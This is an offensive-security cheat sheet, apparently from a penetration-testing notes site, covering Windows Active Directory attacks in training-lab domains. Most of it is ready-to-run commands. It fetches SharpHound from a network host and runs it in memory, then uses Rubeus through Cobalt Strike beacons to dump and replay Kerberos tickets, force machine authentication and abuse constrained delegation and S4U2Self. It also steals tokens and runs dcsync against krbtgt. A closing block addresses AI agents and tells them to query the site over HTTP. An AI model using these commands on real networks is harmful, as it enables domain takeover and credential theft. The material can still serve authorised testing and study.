# Tips & Tricks ## Tips & Tricks ### PowerShell Running a service in the background (Equivalent of using the & at the end of a command Linux): ```powershell Start-Job {} ``` Killing the initial shell WILL kill the sub process. Only use this command if you know that initial shell will remain active. ### Command Prompt Running a service in the background (Equivalent of using the & at the end of a command Linux): ```bash START /B ``` Killing the initial shell WILL kill the sub process. Only use this command if you know that initial shell will remain active. ## Downloading and Running a EXE in Memory ``` $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/SharpHound.exe') $assem = [System.Reflection.Assembly]::Load($data) [Sharphound.Program]::Main("-d north.sevenkingdoms.local -c all".Split()) ``` Get a list of tickets ```shell beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage ``` Extract: ```shell beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap ``` Use the extracted ticket: ```shell beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFwj[...]MuSU8= ``` Jump into the process with that token ```shell beacon> steal_token 1540 ``` You can also force Computer objects to authenticate with the service and steal their tickets: Monitor for new tickets with Rubeus: ```shell beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap ``` Run SharpSpoolTrigger to force authentication ```shell beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc-2.dev.cyberbotic.io web.dev.cyberbotic.io ``` DC-2 is the target and WEB is the listener Machine tickets can be used using the **S4U2Self Abuse** method. ## Constrained Delegation This aims to restrict the services to which the server can act on behalf of a user. The constrains no longer allow the server to cache TGTs of other users. Instead, it is only allowed to get TGS for another user with its own TGT. Finding computers with constrained delegation: ```shell beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json ``` Finding users with constrained delegation: ```shell beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json ``` Constrained delegation can be configured on user accounts as well as user accounts. First, we need the TGT of the account (user or computer) that is trusted for delegation. You can get this with the `dump` command of Rubeus. ```shell beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap ``` If you have the NTLM or AES hash of the user, you can request the TGT using the `asktgt` in Rubeus. Next you can perform a S4U request to obtain a usable TGS for the allowed service. ```shell beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$ /ticket:doIFLD[...snip...]MuSU8= /nowrap ``` * `/impersonateuser` is the user we want to impersonate - they should have local admin access on the target machine. nlamb is a domain admin which is required for accessing the domain controller. * `/msdsspn` is the service principal name that SQL-2 is allowed to delegate to. * `/user` is the principal allowed to perform the delegation. * `/ticket` is the TGT for `/user`. The above will perform a S4U2Self and then S4U2Proxy to get the S4U2Proxy ticket needed. Create a process we can steal: ```shell beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv ``` Steal the process: ```shell beacon> steal_token 5540 ``` ## Alternate Service Name When configuring Kerberos Constrained Delegation, keep in mind that you are delegating credentials not only to the service type you specified but also to the rest of the service types running under the same account. Also, the SPN specified in the sname field, doesn’t seem to be used as part of the authentication mechanism. This can be mitigated by enabling [*Microsoft network server: Server SPN target name validation level: Required from client*](https://technet.microsoft.com/en-us/itpro/windows/keep-secure/microsoft-network-server-server-spn-target-name-validation-level). However, the `sname` field of the ticket is not signed and can be tampered with. So you can change the `sname` of the ticket to another `sname` that is being ran by the same account as the previous one and get access to the requested SPN. You can abuse this with Rubeus ``` beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv beacon> steal_token 2580 ``` If you get LDAP on the DC, you can perform a dcsync attack. ```shell beacon> dcsync dev.cyberbotic.io DEV\krbtgt ``` ## S4U2Self Abuse S4U2Self allows a service to obtain a TGS to itself on behalf of another user. S4U2Proxy allows a service to obtain a TGS on behalf of a user to another service. If we have the TGT of the computer that can perform S4U2Self, we can request to impersonate any user to the service provided by that account. ```shell beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap ``` The `/self` flag is used to get a TGS on behalf of another user to itself. You can then use that ticket to create a process as that user and use that to authenticate to other systems. ``` beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8= beacon> steal_token 2664 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.dragonsploit.com/windows/tips-and-tricks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.